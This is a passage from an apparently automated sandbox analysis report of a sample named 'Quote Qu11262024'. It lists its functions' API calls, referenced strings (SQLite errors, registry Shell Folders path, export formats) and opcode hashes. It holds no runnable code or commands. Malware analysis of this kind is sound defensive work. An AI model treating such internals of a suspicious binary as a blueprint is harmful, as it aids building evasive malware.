                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                    • String ID: advapi32.dll
                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf
                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                    • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                    • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 2521778956-791839006
                                                                                                    • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                    • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                    • API String ID: 999028693-502967061
                                                                                                    • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                    • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                    • memset.MSVCRT ref: 00408E46
                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2350177629-0
                                                                                                    • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                    • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                    • API String ID: 2221118986-1606337402
                                                                                                    • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                    • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                    • memset.MSVCRT ref: 00408FD4
                                                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                    • memset.MSVCRT ref: 00409042
                                                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 265355444-0
                                                                                                    • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                    • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4131475296-0
                                                                                                    • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                    • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                    • API String ID: 2618321458-3614832568
                                                                                                    • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                    • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFilefreememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2507021081-0
                                                                                                    • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                    • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                    APIs
                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                    • free.MSVCRT ref: 00417544
                                                                                                    • free.MSVCRT ref: 00417562
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4131324427-0
                                                                                                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                    • free.MSVCRT ref: 0041822B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PathTemp$free
                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                    • API String ID: 924794160-1420421710
                                                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                    • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                    • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                    APIs
                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                    • String ID: General
                                                                                                    • API String ID: 999786162-26480598
                                                                                                    • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                    • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                    • _snwprintf.MSVCRT ref: 0040977D
                                                                                                    • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                    • String ID: Error$Error %d: %s
                                                                                                    • API String ID: 313946961-1552265934
                                                                                                    • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                    • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                    • API String ID: 0-1953309616
                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
